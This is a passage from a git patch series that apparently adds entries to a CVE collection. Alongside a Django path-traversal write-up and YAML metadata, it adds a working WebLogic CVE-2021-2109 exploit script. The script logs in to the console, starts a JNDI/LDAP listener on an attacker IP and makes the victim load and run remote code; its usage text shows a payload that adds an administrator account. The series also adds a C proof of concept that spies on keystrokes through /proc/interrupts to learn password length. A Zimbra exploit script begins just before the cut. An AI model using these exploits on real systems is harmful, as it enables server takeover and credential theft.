Content-Transfer-Encoding: 8bit --- cve/django/2021/CVE-2021-31542/README.md | 27 ++++++++++++++++++++++++ cve/django/2021/yaml/CVE-2021-31542.yaml | 22 +++++++++++++++++++ openkylin_list.yaml | 1 + 3 files changed, 50 insertions(+) create mode 100644 cve/django/2021/CVE-2021-31542/README.md create mode 100644 cve/django/2021/yaml/CVE-2021-31542.yaml diff --git a/cve/django/2021/CVE-2021-31542/README.md b/cve/django/2021/CVE-2021-31542/README.md new file mode 100644 index 00000000..9d77b142 --- /dev/null +++ b/cve/django/2021/CVE-2021-31542/README.md @@ -0,0 +1,27 @@ +## Django上传文件目录穿越漏洞——CVE-2021-31542 +## 漏洞描述 +Django 3.2.1, 3.1.9, and 2.2.21: CVE-2021-31542: Potential + directory-traversal via uploaded files + +在这些版本的Django中使用`MultiPartParser`, `UploadedFile`, 和 `FieldFile` 时,存在构造特别的文件名../等进行目录穿越漏洞。 +构造文件名参考:/tmp/../path + +## 修复方案: +空文件名和带..的文件名都将拒绝 + +在文件:django/core/files/utils.py 中添加方法: +``` +def validate_file_name(name): + if name != os.path.basename(name): + raise SuspiciousFileOperation("File name '%s' includes path elements" % name) + + # Remove potentially dangerous names + if name in {'', '.', '..'}: + raise SuspiciousFileOperation("Could not derive file name from '%s'" % name) + + return name +``` + + +**参考 commit** +https://github.com/django/django/commit/04ac1624bdc2fa737188401757cf95ced122d26d diff --git a/cve/django/2021/yaml/CVE-2021-31542.yaml b/cve/django/2021/yaml/CVE-2021-31542.yaml new file mode 100644 index 00000000..f4db55bd --- /dev/null +++ b/cve/django/2021/yaml/CVE-2021-31542.yaml @@ -0,0 +1,22 @@ +id: CVE-2021-31542 +source: + https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md +info: + name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 + severity: high + description: | + 在Django 2.2(2.2.21之前)、3.1(3.1.9之前)和3.2(3.2.1之前)中,MultiPartParser、UploadedFile和FieldFile允许通过上传文件和适当伪造的文件名进行目录穿越。 + scope-of-influence: + Django 2.2.x - 2.2.21 + Django 3.1.x - 3.1.9 + Django 3.2.x - 3.2.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-31542 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-31542 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None + tags: Django, Directory traversal \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 52d07ef1..211571f6 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -148,6 +148,7 @@ cve: - CVE-2021-3537 django: - CVE-2022-28346 + - CVE-2021-31542 fortinac: - CVE-2022-39952 redis: From 7f856b2e19631e2e57bc5954a8e95ababe3f2530 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Fri, 7 Apr 2023 06:12:35 +0000 Subject: [PATCH 070/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2021/.keep diff --git a/cve/weblogic/2021/.keep b/cve/weblogic/2021/.keep new file mode 100644 index 00000000..e69de29b From 0d89980ac9ad234186fbcfb3b274120019be23a0 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Fri, 7 Apr 2023 06:13:53 +0000 Subject: [PATCH 071/109] add CVE-2021-2109 Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- .../2021/CVE-2021-2109/CVE-2021-2109.py | 168 ++++++++++++++++++ cve/weblogic/2021/yaml/CVE-2021-2109.yaml | 20 +++ 2 files changed, 188 insertions(+) create mode 100644 cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py create mode 100644 cve/weblogic/2021/yaml/CVE-2021-2109.yaml diff --git a/cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py b/cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py new file mode 100644 index 00000000..8e27590b --- /dev/null +++ b/cve/weblogic/2021/CVE-2021-2109/CVE-2021-2109.py @@ -0,0 +1,168 @@ +import urllib.request, urllib.parse, http.cookiejar, ssl +import sys, os, optparse, subprocess, threading, time + +## Static vars; change at will, but recommend leaving as is +sURL = 'http://192.168.0.100:7001' +iTimeout = 5 +oRun = None + +## Ignore unsigned certs, if any because WebLogic is default HTTP +ssl._create_default_https_context = ssl._create_unverified_context + +class runJar(threading.Thread): + def __init__(self, sJarFile, sCMD, sAddress): + self.stdout = [] + self.stderr = '' + self.cmd = sCMD + self.addr = sAddress + self.jarfile = sJarFile + self.proc = None + threading.Thread.__init__(self) + + def run(self): + self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True) + for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line) + for line in iter(self.proc.stderr.readline, ''): self.stderr += line + + +def findJNDI(): + sCurDir = os.getcwd() + sFile = '' + for file in os.listdir(sCurDir): + if 'JNDI' in file and '.jar' in file: + sFile = file + print('[+] Found and using ' + sFile) + return sFile + +def findJAVA(bVerbose): + try: + oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT) + except: + exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.') + sResult = list(oProc.stdout)[0].decode() + if bVerbose: print('[+] Found Java: ' + sResult) + +def checkParams(options, args): + if args: sHost = args[0] + else: + sHost = input('[?] Please enter the URL ['+sURL+'] : ') + if sHost == '': sHost = sURL + if sHost[-1:] == '/': sHost = sHost[:-1] + if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost + if options.username: sUser = options.username + else: + sUser = input('[?] Username [weblogic] : ') + if sUser == '': sUser = 'weblogic' + if options.password: sPass = options.password + else: + sPass = input('[?] Password [Passw0rd-] : ') + if sPass == '': sPass = 'Passw0rd-' + if options.command: sCMD = options.command + else: + sCMD = input('[?] Command to run [calc] : ') + if sCMD == '': sCMD = 'calc' + if options.listenaddr: sLHOST = options.listenaddr + else: + sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ') + if sLHOST == '': sLHOST = '192.168.0.10' + if options.verbose: bVerbose = True + else: bVerbose = False + return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) + +def startListener(sJarFile, sCMD, sAddress, bVerbose): + global oRun + oRun = runJar(sJarFile, sCMD, sAddress) + oRun.start() + print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint') + oRun.join(3) + if not oRun.stderr == '': + exit('[-] Error starting Java listener:\n' + oRun.stderr) + bThisLine=False + if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180') + for line in oRun.stdout: + if bThisLine: return line.split('/')[3].replace('\n','') + if 'JDK 1.8' in line: bThisLine = True + +def endIt(): + global oRun + print('[+] Closing threads') + if oRun: oRun.proc.terminate() + exit(0) + +def main(): + usage = ( + 'usage: %prog [options] URL \n' + ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n' + ' in the current working folder\n' + 'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n' + 'Only works when hacker is reachable via an IPv4 address\n' + 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n' + 'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n' + 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add' + ) + + parser = optparse.OptionParser(usage=usage) + parser.add_option('--username', '-u', dest='username') + parser.add_option('--password', '-p', dest='password') + parser.add_option('--command', '-c', dest='command') + parser.add_option('--listen', '-l', dest='listenaddr') + parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False) + + ## Get or ask for the vars + (options, args) = parser.parse_args() + (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args) + + ## Verify Java and JAR file + sJarFile = findJNDI() + findJAVA(bVerbose) + + ## Keep track of cookies between requests + cj = http.cookiejar.CookieJar() + oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) + + print('[+] Verifying reachability') + ## Get the cookie + oRequest = urllib.request.Request(url = sHost + '/console/') + oResponse = oOpener.open(oRequest, timeout = iTimeout) + for c in cj: + if c.name == 'ADMINCONSOLESESSION': + if bVerbose: print('[+] Got cookie "' + c.value + '"') + + ## Logging in + lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'} + lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'} + oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders) + oResponse = oOpener.open(oRequest, timeout = iTimeout) + sResult = oResponse.read().decode(errors='ignore').split('\r\n') + bSuccess = True + for line in sResult: + if 'Authentication Denied' in line: bSuccess = False + if bSuccess: print('[+] Succesfully logged in!\n') + else: exit('[-] Authentication Denied') + + ## Launch the LDAP listener and retrieve the random endpoint value + sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose) + if bVerbose: print('[+] Got Java value: ' + sRandom) + + ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1" + print('\n[+] Firing exploit now, hold on') + ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-) + sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3] + sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)' + if bVerbose: print('[!] Using URL ' + sFullUrl) + oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders) + oResponse = oOpener.open(oRequest, timeout = iTimeout) + time.sleep(5) + bExploitWorked = False + for line in oRun.stdout: + if 'Log a request' in line: bExploitWorked = True + if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim') + if not bExploitWorked: print('[-] Exploit failed, victim likely patched') + else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)') + if bVerbose: print(oRun.stderr) + endIt() + +if __name__ == "__main__": + try: main() + except KeyboardInterrupt: endIt() + \ No newline at end of file diff --git a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml new file mode 100644 index 00000000..f8fbc6f7 --- /dev/null +++ b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-2109 +source: https://www.exploit-db.com/exploits/49461 +info: + name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: critical + description: | + Oracle 融合中间件(组件:控制台)的 Oracle WebLogic Server 产品中的漏洞。受影响的受支持版本为 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0 和 14.1.1.0.0。容易利用的漏洞允许具有通过 HTTP 进行网络访问的高特权攻击者破坏 Oracle WebLogic Server。成功攻击此漏洞可导致接管 Oracle WebLogic Server。 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0, weblogic 14.1.1.0.0 + reference: + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2109 + https://nvd.nist.gov/vuln/detail/CVE-2021-2109 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-2109 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2020, Weblogic \ No newline at end of file From 737337469af40a50ca50bf5df11084acb78b12f4 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Fri, 7 Apr 2023 06:14:04 +0000 Subject: [PATCH 072/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/weblogic/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/2021/.keep diff --git a/cve/weblogic/2021/.keep b/cve/weblogic/2021/.keep deleted file mode 100644 index e69de29b..00000000 From 55d97abf87e5ec5dfcc0d650413f9516bcbe0b4a Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Mon, 10 Apr 2023 00:49:11 +0000 Subject: [PATCH 073/109] =?UTF-8?q?update=20cve/weblogic/2021/yaml/CVE-202?= =?UTF-8?q?1-2109.yaml.=20=E4=BF=AE=E6=94=B9=E8=AF=84=E7=BA=A7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- cve/weblogic/2021/yaml/CVE-2021-2109.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml index f8fbc6f7..49f54966 100644 --- a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml +++ b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml @@ -2,7 +2,7 @@ id: CVE-2021-2109 source: https://www.exploit-db.com/exploits/49461 info: name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 - severity: critical + severity: high description: | Oracle 融合中间件(组件:控制台)的 Oracle WebLogic Server 产品中的漏洞。受影响的受支持版本为 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0 和 14.1.1.0.0。容易利用的漏洞允许具有通过 HTTP 进行网络访问的高特权攻击者破坏 Oracle WebLogic Server。成功攻击此漏洞可导致接管 Oracle WebLogic Server。 scope-of-influence: From d779c47bd6c05d2d06aaf93d5884ec07a07e6d76 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Mon, 10 Apr 2023 00:59:19 +0000 Subject: [PATCH 074/109] update other_list.yaml. add weblogic CVE-2021-2109 Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index c02895cc..ede901d9 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -53,6 +53,7 @@ cve: - CVE-2022-23131 weblogic: - CVE-2022-2555 + - CVE-2021-2109 Zyxel: - CVE-2022-30525 WordPress: From 1085758b57aaca708146d226e5fd08c26823eee8 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <19373368@buaa.edu.cn> Date: Tue, 11 Apr 2023 00:40:28 +0000 Subject: [PATCH 075/109] update cve/weblogic/2021/yaml/CVE-2021-2109.yaml. tag change Signed-off-by: Amon_S1eepy <19373368@buaa.edu.cn> --- cve/weblogic/2021/yaml/CVE-2021-2109.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml index 49f54966..9062f792 100644 --- a/cve/weblogic/2021/yaml/CVE-2021-2109.yaml +++ b/cve/weblogic/2021/yaml/CVE-2021-2109.yaml @@ -17,4 +17,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: cve2020, Weblogic \ No newline at end of file + tags: cve2021, Weblogic \ No newline at end of file From 86246ec2b473e5fdd982d5e7bacbfbf5626eea94 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:51:10 +0000 Subject: [PATCH 076/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep new file mode 100644 index 00000000..e69de29b From 4102a21f7600dcb59e120c9f783ca1d39550d8c5 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:53:36 +0000 Subject: [PATCH 077/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b From 9d148ec1b4b904c8a95970025646b17d9fff714e Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:54:00 +0000 Subject: [PATCH 078/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/yaml/.keep diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep new file mode 100644 index 00000000..e69de29b From e3b68afcf3ec96bed07b7ca2e9749274d85dd6c2 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:54:09 +0000 Subject: [PATCH 079/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/linux-kernel/2011/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep deleted file mode 100644 index e69de29b..00000000 From 70511cebd501e2a981159f2b47eb38a0fdb8be39 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:56:06 +0000 Subject: [PATCH 080/109] =?UTF-8?q?=E4=BF=AE=E6=94=B9POC=20=E6=B7=BB?= =?UTF-8?q?=E5=8A=A0POC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 .../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 2 files changed, 178 insertions(+) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..bab4fad3 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file From 8935efc390c5b846d5b626a9cb73b923185a9d18 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:56:45 +0000 Subject: [PATCH 081/109] add cve/linux-kernel/2011/CVE-2011-4917/README.md. Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/README.md new file mode 100644 index 00000000..d95ca27d --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. +In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat. + +The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters. + +The limitations: + - it works on 2-core CPUs only. + - it works on 1-keyboard systems only. + - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input). + - it doesn't carefully filter keystrokes after ENTER. + +run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu + +P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published. \ No newline at end of file From 6200b18e0f91efbc91f42f03935b80e9f5674271 Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:57:24 +0000 Subject: [PATCH 082/109] rename cve/linux-kernel/2011/yaml/.keep to cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml. Signed-off-by: KunWang --- cve/linux-kernel/2011/yaml/.keep | 0 cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml | 18 ++++++++++++++++++ 2 files changed, 18 insertions(+) delete mode 100644 cve/linux-kernel/2011/yaml/.keep create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml new file mode 100644 index 00000000..255ddd17 --- /dev/null +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml @@ -0,0 +1,18 @@ +id: CVE-2011-4917 +source: https://www.openwall.com/lists/oss-security/2011/11/07/9 +info: + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file From a6d1708bf4aa1d8881aadafcbf8ed5db5228eb5c Mon Sep 17 00:00:00 2001 From: KunWang Date: Tue, 11 Apr 2023 03:57:59 +0000 Subject: [PATCH 083/109] update other_list.yaml. Signed-off-by: KunWang --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index ede901d9..cf82c0bd 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -14,6 +14,7 @@ cve: - CVE-2020-27194 - CVE-2023-0179 - CVE-2018-18955 + - CVE-2011-4917 polkit: - CVE-2021-3560 Outlook: From cc9e81fc13988bee0e9dc4f7ced3ed5d1eb647cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 07:47:07 +0000 Subject: [PATCH 084/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-41352?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Zimbra/2022/CVE-2022-41352/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Zimbra/2022/CVE-2022-41352/.keep diff --git a/cve/Zimbra/2022/CVE-2022-41352/.keep b/cve/Zimbra/2022/CVE-2022-41352/.keep new file mode 100644 index 00000000..e69de29b From 6c6fa02ed99098b2d8b1d911b2e6e748ce7ee777 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 07:48:42 +0000 Subject: [PATCH 085/109] add cve-2022-41352 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 高方远 --- .../2022/CVE-2022-41352/cve-2022-41352.py | 236 ++++++++++++++++++ 1 file changed, 236 insertions(+) create mode 100644 cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py new file mode 100644 index 00000000..d440f7e6 --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py @@ -0,0 +1,236 @@ +#!/usr/bin/env python3 + +import sys +import smtplib +import argparse +from time import sleep +from email.mime.multipart import MIMEMultipart +from email.mime.application import MIMEApplication +from email.mime.text import MIMEText +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# CONFIGURATION 